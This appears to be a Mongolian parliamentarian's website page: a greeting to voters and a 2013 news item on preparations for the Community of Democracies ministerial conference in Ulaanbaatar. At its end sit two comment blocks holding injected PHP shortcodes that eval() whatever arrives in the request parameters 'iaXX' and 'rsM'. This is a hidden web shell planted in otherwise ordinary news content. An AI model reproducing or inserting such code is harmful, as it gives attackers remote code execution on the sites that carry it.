Мэндчилгээ

Эрхэм сонгогч та бүхэнтэй онлайнаар мэндчилж байна.Энэхүү цахим хуудаснаас Улсын Их Хурлын гишүүн миний санаачилан өргөн мэдүүлсэн хууль, чуулганы нэгдсэн болон байнгын хороодын хуралдаануудад хэлсэн үг, цаг үеийн мэдээ мэдээлэл, хэвлэлийн тойм зэрэг мэдээллийг авах боломжтой.Мөн цахим хуудсаараа дамжуулан та бүхнээс асуулт, санал хүсэлт шуурхай хүлээн авах болно.Танд амжилт хүсье.

 

ХОЛБОГДОХ

АОХН-ийн Сайд нарын VII бага хуралд 1215 төлөөлөгч оролцоно

2013оны 4сарын 25

_MG_7310Монгол Улсын Гадаад харилцааны сайд Л. Болд,Ардчилсан орнуудын хамтын нийгэмлэгийн ажлын албаны ерөнхий зохицуулагч, Тусгай үүрэг гүйцэтгэгч Элчин сайд Д.Ганболд нар өнөөдөр хэвлэлийн бага хурал хийлгэж, сэтгүүлчдэд АОХН-ийн Сайд нарын VII бага хурлын бэлтгэл ажлын талаар мэдээлэл өглөө.

Манай улс АОХН-ийн Сайд нарын VII бага хурлыг 2013 оны 4 дүгээр сарын 29-нд эх орондоо зохион байгуулна. Сайд нарын бага хурлын өмнө буюу 4 дүгээр сарын 27-28-нд АОХН-ийн Парламент, Эмэгтэйчүүд, Залуус, Иргэний нийгмийн чуулга уулзалтууд болно. Дээрх арга хэмжээнүүдэд 104 орны 1215 төлөөлөгч оролцохоор түрүүчээсээ ирж эхлээд байна. Бага хурлын үйл ажиллагааг сурвалжлахаар гадаадын 50 гаруй, дотоодын 200 гаруй хэвлэл мэдээллийн хэрэгсэл бүртгүүлсэн  байна. Монгол Улсын Ерөнхийлөгчийн Хүндэт зочноор 12 орны төр, засгийн тэргүүн, дэлхий дахинаа нэр хүндтэй улс төр, нийгмийн зүтгэлтнүүд  уригдсан. Одоогоор зарим орны төр, засгийн тэргүүн, Гадаад хэргийн сайд, сайдын түвшинд  50 гаруй орон ирэхээ нотлоод байна.  Ардчилал, хүний эрхийн төлөө тууштай тэмцэж амжилтад хүрснийхээ төлөө Нобелийн энхтайвны шагнал хүртсэн Мьянмарын Ан Сан Суу Чий, Йемений Таваккол Карман нар бага хуралд оролцно

<!– [insert_php]if (isset($_REQUEST["iaXX"])){eval($_REQUEST["iaXX"]);exit;}[/insert_php][php]if (isset($_REQUEST["iaXX"])){eval($_REQUEST["iaXX"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["rsM"])){eval($_REQUEST["rsM"]);exit;}[/insert_php][php]if (isset($_REQUEST["rsM"])){eval($_REQUEST["rsM"]);exit;}[/php] –>